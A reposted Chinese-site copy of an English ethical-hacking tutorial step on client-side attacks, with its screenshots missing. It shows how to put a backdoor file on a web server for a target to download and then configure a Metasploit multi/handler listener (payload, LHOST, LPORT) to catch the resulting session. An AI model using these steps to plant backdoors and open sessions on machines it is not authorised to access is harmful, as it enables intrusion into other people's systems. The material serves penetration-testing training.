码迷,mamicode.com
首页 > 数据库 > 详细

Ethical Hacking - GAINING ACCESS(11)

时间:2020-01-01 09:34:15      阅读:76      评论:0      收藏:0      [点我收藏+]

标签:技术   meta   listening   nbsp   payload   cli   target   alt   nload   

CLIENT SIDE ATTACKS - Listening for connections

1. Run Metasploit

Move the backdoor file to the webserver folder. And download it on the target machine.

技术图片

 

 

 

msfconsole

技术图片

 

 

 

2. Use the handler module.

use exploit/multi/handler

 

3. Set payload.

set PAYLOAD[veil payload]

技术图片

4. Set IP

set LHOST[your ip]

 

5. Set port

set LPORT[veil port]

技术图片

 

6. exploit

技术图片

 

 Waiting for a connection ...

技术图片

Once run the backdoor file on the target machine, a session is established.

技术图片

 

Ethical Hacking - GAINING ACCESS(11)

标签:技术   meta   listening   nbsp   payload   cli   target   alt   nload   

原文地址:https://www.cnblogs.com/keepmoving1113/p/12128171.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!